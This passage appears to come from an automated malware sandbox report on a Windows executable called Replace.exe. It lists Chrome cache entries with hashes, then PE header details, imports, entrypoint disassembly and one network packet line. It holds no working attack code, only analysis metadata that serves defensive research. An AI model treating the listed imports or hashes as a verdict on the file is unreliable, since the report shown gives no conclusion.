                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.oT1FwJRCVC4.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvBynad-nWEy1xIb9j1w6LpLOF6IQ"
                                                                                                                                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.nj=function(a,b,c){return c?a|b:a&~b};_.oj=function(a,b,c,d){a=_.hb(a,b,c,d);return Array.isArray(a)?a:_.lc};_.pj=function(a,b){a=_.nj(a,2,!!(2&b));a=_.nj(a,32,!0);return a=_.nj(a,2048,!1)};_.qj=function(a,b){0===a&&(a=_.pj(a,b));return a=_.nj(a,1,!0)};_.rj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.sj=function(a,b,c){32&b&&c||(a=_.nj(a,32,!1));return a};._.tj=function(a,b,c,d,e,f){var g=!!(2&b),h=g?1:2;const k=1===h;h=2===h;e=!!e;f&&(f=!g);g=_.oj(a,b,d);var l=g[_.v]|0;const n=!!(4&l);if(!n){l=_.qj(l,b);var p=g,r=b,t;(t=!!(2&l))&&(r=_.nj(r,2,!0));let C=!t,X=!0,P=0,H=0;for(;P<p.length;P++){const O=_.Sa(p[P],c,r);if(O instanceof c){if(!t){const Fa=!!((O.ma[_.v]|0)&2);C&&(C=!Fa);X&&(X=Fa)}p[H++]=O}}H<P&&(p.length=H);l=_.nj(l,4,!0);l=_.nj(l,16,X);l=_.nj(l,8,C);_.wa(p,l);t&&Object.freeze(p)}c=!!(8&l)||k&&!g.length;if(f&&!c){_.rj(l)&&(g=_.va(g),l=_.pj(l,.b),b=_.gb(a,b,d,g));f=g;c=l;for(p=0;p<f.length;p++)l=f[p],r=_.eb(l),l

                                                                                                                                                                                                            Chrome Cache Entry: 63

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2937)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2942
                                                                                                                                                                                                            Entropy (8bit):5.842780062817867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:RuHwFGWQGKlgZ01IFb8jsgIbx6666PuimRDJaYdFUawY7lXcQjlwV+ib37aOcQgJ:RfkD9liywgIN6666PEWYLUkXculwdraj
                                                                                                                                                                                                            MD5:BC5E2F0579E5FA470364680F05389C67
                                                                                                                                                                                                            SHA1:808A9CF1332725F0F0765CDA9A7A3B2E5AD16D3D
                                                                                                                                                                                                            SHA-256:2FBFA151A394F6A4B24169A7DB61B4CF700C4FC72FEF61BF58903D28A7251420
                                                                                                                                                                                                            SHA-512:60BC3D32E8676B4D0DC4897FCF48430725BB29FEA94BD6C980F781FDE9FE8FB9BAD6643C4201FCDAF92259B1DBD21C9D15D4F53520F315FBEABBAE91396AD463
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                            Preview:)]}'.["",["student loans","fallout next gen update","southwest airlines flights","jose abreu houston astros","wwe nxt spring breakin","emotional support alligator wally","nyt crossword clues","dj moore on caleb williams"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wcmZoN21tEixKb3PDqSBBYnJldSDigJQgQ3ViYW4gYmFzZWJhbGwgZmlyc3QgYmFzZW1hbjKbC2RhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBTlFNQklnQUNFUUVERVFIL3hBQWJBQUFDQWdNQkFBQUFBQUFBQUFBQUFBQUFCd1FGQXdZSUFmL0VBREFRQUFJQkF3SURCd01EQlFBQUFBQUFBQUVDQXdBRUVRVWhCaEl4QnhOQlVYR0JrU0l5WVVKU29TT

                                                                                                                                                                                                            Chrome Cache Entry: 64

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                            Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                            Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                            Chrome Cache Entry: 65

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):139819
                                                                                                                                                                                                            Entropy (8bit):5.440766391654872
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:yMRA4aoKJXjPInWWt/usD98kiHLnRA0zqevcZgDhaV+trbbbhYxvdU:eCKJou8TMyel0shCO
                                                                                                                                                                                                            MD5:E92447BF94FA592067E133CF3E581D3D
                                                                                                                                                                                                            SHA1:E0CDECE2EE36171EC9008DC3D676E9EC7E273F89
                                                                                                                                                                                                            SHA-256:C8B666DC1E76BF51ED250F8DB10DAAC14E13EBA6D52E41EA9D12FEFB3EDF5701
                                                                                                                                                                                                            SHA-512:A6D6B74FFD9DC5BC4C37ABD5CF4992D56C72933D872D70AADAB6FF83C66E6F013E779EA1A5126E7E69D9A4F9B1F65B4EAF5CCB516B1F83037913C64D88913B8B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                            Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ra gb_ib gb_Ud gb_od\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Id\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_sd gb_ld gb_yd gb_xd\"\u003e\u003cdiv class\u003d\"gb_rd gb_hd\"\u003e\u003cdiv class\u003d\"gb_Pc gb_r\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Pc gb_Sc gb_r\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                            Chrome Cache Entry: 66

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3572), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3572
                                                                                                                                                                                                            Entropy (8bit):5.150542995862274
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:RJYrcoiktfqqMghOKTEzNx8BSIMw591g8IOl8u8i8DF+Ks:wkktfqqMghxlg8Ig8u78D2
                                                                                                                                                                                                            MD5:88BC8C86A83B9BD8EDA6FDF225CDC8DD
                                                                                                                                                                                                            SHA1:473D84930F027A365278C15282725A69721F4B18
                                                                                                                                                                                                            SHA-256:47D960E93D9E7AB4C760A09DA0AA5E6549A8355AD5C0BA8476D4269F4FBDB354
                                                                                                                                                                                                            SHA-512:3BC486D908160D297AD3028C27177A9C41A1D87EF29A456058265FAF74A1DA069D3B0578F05A79F866C2DB752D5E0E42D179158BD62251D4FDA601A7CBA7CC4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.T5bVtXo12IQ.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTssrVR1lBtzoy_MObv1DSp-vWG36A"
                                                                                                                                                                                                            Preview:.gb_3e{background:rgba(60,64,67,.9);-webkit-border-radius:4px;border-radius:4px;color:#fff;font:500 12px "Roboto",arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000;-webkit-font-smoothing:antialiased}.gb_Hc{text-align:left}.gb_Hc>*{color:#bdc1c6;line-height:16px}.gb_Hc div:first-child{color:white}.gb_qa{background:none;border:1px solid transparent;-webkit-border-radius:50%;border-radius:50%;-webkit-box-sizing:border-box;box-sizing:border-box;cursor:pointer;height:40px;margin:8px;outline:none;padding:1px;position:absolute;right:0;top:0;width:40px}.gb_qa:hover{background-color:rgba(68,71,70,.08)}.gb_qa:focus,.gb_qa:active{background-color:rgba(68,71,70,.12)}.gb_qa:focus-visible{border-color:#0b57d0;outline:1px solid transparent;outline-offset:-1px}.gb_i .gb_qa:hover,.gb_i .gb_qa:focus,.gb_i .gb_qa:active{background-color:rgba(227,227,227,.08)}.gb_i .gb_qa:focus-visible{border-color:#a8c7fa}.gb_ra{-webkit-box

                                                                                                                                                                                                            Chrome Cache Entry: 67

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                            Chrome Cache Entry: 68

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2124)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):121628
                                                                                                                                                                                                            Entropy (8bit):5.506662476672723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:QI9yvwslCsrCF9f/U2Dj3Fkk7rEehA5L1kx:l9ygsrieDkVaL1kx
                                                                                                                                                                                                            MD5:F46ACD807A10216E6EEE8EA51E0F14D6
                                                                                                                                                                                                            SHA1:4702F47070F7046689432DCF605F11364BC0FBED
                                                                                                                                                                                                            SHA-256:D6B84873D27E7E83CF5184AAEF778F1CCB896467576CD8AF2CAD09B31B3C6086
                                                                                                                                                                                                            SHA-512:811263DC85C8DAA3A6E5D8A002CCCB953CD01E6A77797109835FE8B07CABE0DEE7EB126274E84266229880A90782B3B016BA034E31F0E3B259BF9E66CA797028
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0"
                                                                                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x20000, ]);.var ba,ca,da,na,pa,va,wa,za;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=da(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)re

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.998466347215378
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:Replace.exe
                                                                                                                                                                                                            File size:36'540'866 bytes
                                                                                                                                                                                                            MD5:fd5cd14325c51ecab6a57d1d665f8852
                                                                                                                                                                                                            SHA1:ea16aa0f197210437733c63a42a8f1dd6442d753
                                                                                                                                                                                                            SHA256:d433cd0ba6b6850a9f616b3b89754a005699547d4e04fadb75cade770156cfd1
                                                                                                                                                                                                            SHA512:9a2e4c8baa01fbafe6968905daeb8d3b7eb62c09d1d7584e973ad1c23d964093e161a51a7390dfaa598d2657f45ca17bf00b5055aeaf0441f875ddb364741d71
                                                                                                                                                                                                            SSDEEP:786432:i9hj60qHOBbQcVM3sct6C2ubdsUeGXV4yQnb+LQgRkrm12PYfrB:i9kH+o5sG2ysbhrmka
                                                                                                                                                                                                            TLSH:9F8733A4BB7D8DB2E92C5930346D9829AF776C85AE30571B05CA3F190EF01E42D72D4B
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..c..........................................@.......................................@................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:073f27c39393527b

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x41c4c3
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x6388E775 [Thu Dec 1 17:42:13 2022 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:bca9d407c1135efbdfa23b18bb82c966

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            call 00007F6B64E2E060h
                                                                                                                                                                                                            jmp 00007F6B64E2DACFh
                                                                                                                                                                                                            jmp 00007F6B64E31CCBh
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                                            call 00007F6B64E2DCADh
                                                                                                                                                                                                            mov dword ptr [esi], 0042B2F4h
                                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                                            mov dword ptr [ecx+04h], 0042B2FCh
                                                                                                                                                                                                            mov dword ptr [ecx], 0042B2F4h
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                                            call 00007F6B64E2DC7Ah
                                                                                                                                                                                                            mov dword ptr [esi], 0042B310h
                                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                                            mov dword ptr [ecx+04h], 0042B318h
                                                                                                                                                                                                            mov dword ptr [ecx], 0042B310h
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                                            lea eax, dword ptr [esi+04h]
                                                                                                                                                                                                            mov dword ptr [esi], 0042B2D4h
                                                                                                                                                                                                            and dword ptr [eax], 00000000h
                                                                                                                                                                                                            and dword ptr [eax+04h], 00000000h
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            add eax, 04h
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call 00007F6B64E30454h
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                                            lea eax, dword ptr [ecx+04h]
                                                                                                                                                                                                            mov dword ptr [ecx], 0042B2D4h
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call 00007F6B64E3049Fh
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                                            lea eax, dword ptr [esi+04h]
                                                                                                                                                                                                            mov dword ptr [esi], 0042B2D4h
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call 00007F6B64E30488h

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x34c480x64.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x109dc.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x24b4.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x30c080x40.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x248.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x2969c0x298009aa6187380ba3f626cbfcab00be92e02False0.6114340173192772data6.739469189102793IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x2b0000xa8ee0xaa00d9810b6d1016c5cb02dea65271eb21e7False0.37474724264705883data4.62117455644981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x360000x3fa00x1400009bea12727dca9a7de51e4ed262a9e6False0.2083984375data3.9023069969476474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x3a0000x109dc0x10a009a086f0c1ff40446a290c69824f9e1b0False0.49437558740601506data5.682494437468369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .reloc0x4b0000x24b40x2600fe7958ff82c9aedb8b7df57a8dfe8573False0.6918174342105263data6.419839830349565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0x3a1a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.4941293032059624
                                                                                                                                                                                                            RT_DIALOG0x3a0e80xb8dataEnglishUnited States0.6684782608695652
                                                                                                                                                                                                            RT_GROUP_ICON0x4a9c80x14data1.15

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            USER32.dllCharUpperW, DestroyWindow, PostMessageA, EndDialog, SetTimer, SendMessageA, LoadIconA, KillTimer, DialogBoxParamA, ShowWindow, SetWindowLongA, GetWindowLongA, GetDlgItem, DialogBoxParamW, SetWindowTextW, SetWindowTextA, MessageBoxW, CharUpperA
                                                                                                                                                                                                            SHELL32.dllShellExecuteExA
                                                                                                                                                                                                            OLEAUT32.dllSysStringLen, SysAllocStringLen, VariantClear
                                                                                                                                                                                                            KERNEL32.dllFindNextFileA, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapSize, GetProcessHeap, GetStringTypeW, GetFileType, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, HeapReAlloc, LCMapStringW, HeapFree, HeapAlloc, ExitProcess, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, AreFileApisANSI, MultiByteToWideChar, GetLastError, WideCharToMultiByte, GetModuleFileNameA, GetModuleFileNameW, FreeLibrary, LoadLibraryExW, FormatMessageW, LocalFree, FormatMessageA, ReadFile, SetLastError, WriteFile, SetFileTime, SetFilePointer, SetEndOfFile, CreateFileW, CreateFileA, CloseHandle, GetFileSize, CreateDirectoryW, RemoveDirectoryW, GetTempPathW, GetCurrentThreadId, GetSystemDirectoryW, GetCurrentDirectoryA, SetCurrentDirectoryA, SetFileAttributesW, GetTempPathA, DeleteFileA, DeleteFileW, SetFileAttributesA, GetCurrentDirectoryW, SetCurrentDirectoryW, GetProcAddress, RemoveDirectoryA, GetCurrentProcessId, GetModuleHandleW, CreateDirectoryA, GetTickCount, FindFirstFileW, FindFirstFileA, FindNextFileW, DecodePointer, FindClose, GetFileAttributesW, GetModuleHandleA, GetFileInformationByHandle, GetFileAttributesA, lstrlenW, lstrcatW, GetVersionExA, ReleaseSemaphore, InitializeCriticalSection, WaitForSingleObject, SetEvent, ResetEvent, CreateSemaphoreA, CreateEventA, GetStdHandle, EnterCriticalSection, LeaveCriticalSection, Sleep, DeleteCriticalSection, GetCurrentProcess, GetProcessAffinityMask, GetSystemInfo, GlobalMemoryStatus, IsProcessorFeaturePresent, VirtualFree, VirtualAlloc, GetCommandLineW, CreateThread, CreateProcessW, GetTempFileNameW, CreateProcessA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, RtlUnwind

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            May 1, 2024 11:07:57.148894072 CEST49678443192.168.2.4104.46.162.224
